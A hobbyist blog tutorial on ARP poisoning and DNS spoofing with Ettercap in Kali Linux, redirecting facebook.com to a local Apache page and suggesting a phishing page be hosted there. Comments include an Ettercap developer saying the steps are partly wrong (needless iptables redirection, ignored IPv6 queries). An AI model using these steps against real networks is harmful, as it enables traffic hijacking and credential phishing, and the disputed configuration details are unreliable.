This blog is NOT OFFICIAL website of Kali Linux. We just share Tutorials to learn Cybersecurity.

Ettercap -- DNS Spoofing in Kali Linux

Home
Today we gonna learn DNS spoofing in our Kali Linux system with the help of Ettercap, and How to use ettercap in Kali Linux? Before learning DNS spoofing we need a clear idea about DNS. DNS stands for Domain Name System. Domain Name System or DNS server translate a human-readable domain-name (such as google.com, nytimes.com) into a numerical IP address that is used to route communications between nodes.

ettercap


As we know every system have an unique IP address, but it is very difficult to remember IP address of many website for a human. So a domain name attached with the IP address. To reduce the effort and improve the performance DNS saves translate data for a limited time which called cache.

This means if it receives another request for same translation, it can replay without needing to ask any other servers until the cache expires.

DNS spoofing is a crucial part of penetration testing. In this method attacker can divert a domain name to a incorrect IP. This results in traffic being diverted to the attacker's computer or any other system.

With the help of DNS spoofing attacker can inject poison in victim's address resolution protocol, and this attack is very hard to detect.

Here for this tutorial we use Ettercap to spoof DNS. Ettercap is a very popular and easy DNS spoofing tool.

How to install ettercap on kali linux? You don't need Ettercap comes pre-installed with Kali Linux, before open it we do some configuration. Open our terminal window and edit etter.conf file in any text editor. The file is located in /etc/ettercap/etter.conf. We use leafpad and the command will be:

leafpad /etc/ettercap/etter.conf
The screenshot is following:

etter.conf


Now we scroll down for the Linux section. The screenshot is following;

etter.conf linux


Here we use IPtables, so we active two commands of IPtable section. We just need to remove those # to active the commands. See the screenshot given below:

ettre.conf linux iptables


Then we save and close it. Then we start our apache web server by following command:

service apache2 start
Then we find our local IP by using following command:

ifconfig
The screenshot is following:

ifconfig


When we open our localhost, it is the homepage of apache web server. We can put anything in our localhost, like phishing page or any malicious web page. Now we change facebook.com domain with our localhost. Means if someone try to open facebook.com in our local network it will open our localhost page not the Facebook.

Now we need to configure another ettercap file called etter.dns by using following command :

leafpad /etc/ettercap/etter.dns
The screenshot is following:
etter.dns



Then we scrool down and set our target. See the following screenshot:

etter.dns target


We remove the highlighted link in the screenshot, and put the link we want to redirect, in our case it is facebook.com so we put it, and we also change the next line for sub-domains.
Then we will change those IP with our local IP. Then we delete the third line. The configuration shown in following screenshot:

etter.dns setting


Then we save the file and close it.
Now we open Ettercap by using following command :

ettercap -G
This will open ettercap's Graphical User Interface(GUI) mode. The screenshot is following;

ettercap GUI


Then we click on Sniff and then Unified Sniffing. The screenshot is following:


Here we need to choose our network interface. Then it will start unified sniffing.
Now we choose our target. Before choosing target we need to stop unified sniffing. To do that we click on the "Start" menu and click on "Stop Sniffing".

Then we go to Target menu and click on Current Target. We can see that we don't have any target in the following screenshot:

ettercap targets


We need to scan for host. So we click on Host menu and click on Scan for Hosts.

Then we can see the Host List from the Host menu. Here we may see some hosts. We need to choose our default gateway as target 1 and victim as target 2. In our case we are the victim so we added our IP in target.

Then we go to the MITM(Man In The Middle) menu, then we click on ARP Poisoning and select "Sniff remote connection", then click on OK. Now the ARP Poisoning is set.

The next step is we need to go into the Plugins section and then go to Manage the Plugins, and we active the dns-spoof plugin by double clicking on it.
The screenshot is following:

dns spoofing


Now we are all set. We go to the Start menu and click on the Start Sniffing.

Now we open our browser and try to open facebook.com but we will redirect ti our localhost. Here any web page we can set our localhost. If there was a phishing page then it will be very dangerous. Want to learn host malicious web pages in localhost try this tutorials:

Weeman Phishing Over Wan

ShellPhish Easy Phishing
author-img
Kali Linux

Comments

6 comments
Post a Comment
  • Unknown photo
    UnknownMarch 25, 2020 at 9:26 PM

    My sniffing is not work wht happen brother please tell me

    Delete Comment
    • Kali Linux photo
      Kali LinuxMarch 26, 2020 at 7:01 AM

      Give me the details of error otherwise i cant help you ? Are you using Kali in Virtual machines?

      Delete Comment
    • AnonymousMay 27, 2020 at 9:44 PM

      no error message in terminal; no error on ettercap got below message in ettercap still not working . my ip was in left and target ip on right

      Delete Comment
    • EttercapJune 9, 2020 at 3:57 AM

      Hi,
      I'm one of the Ettercap developers. I've been noticed about this blog by one of the Ettercap users.

      It appears that this blog is providing unprecise information of how to use Ettercap to run a DNS spoof attack.

      The first main issue is that uncommenting the redir_command_on, redir_command_off commands are NOT necessary to run this attack. It even lead to unwanted issues when not handled carefully, since then, Ettercap tries to intercept the SSL handshake of every SSL enabled protocol by default with it's self-signed certificate.

      The second issue your blog entry introduces, is the fact that it ignores the fact of a world with IPv6 in parallel to IPv4. So while you're only spoofing responses to type A queries, the DNS resolver will in parallel fire AAAA queries, your example of etter.dns ignores. This leads to the result that the DNS resolver gets NXDOMAIN responses and A responses which seem to confuse a number of DNS resolvers. Either the Domain is there but doesn't have records for this record type or it is not there.

      Please correct your blog entry in order to not spread false information.
      Thanks
      Alexander Koeppe

      Delete Comment
      • Kali Linux photo
        Kali LinuxJune 10, 2020 at 5:25 AM

        Hello Alexander, We feel glad that you read our article, and we are very sorry for our content. To clear things we can say that we don't share false articles and always try to give genuine knowledge to our readers. But sometimes mistakes happen. We will correct this article as per your recommendation. Thank you very much for giving us time and making things beautiful.

        Delete Comment
      google-playkhamsatmostaqltradent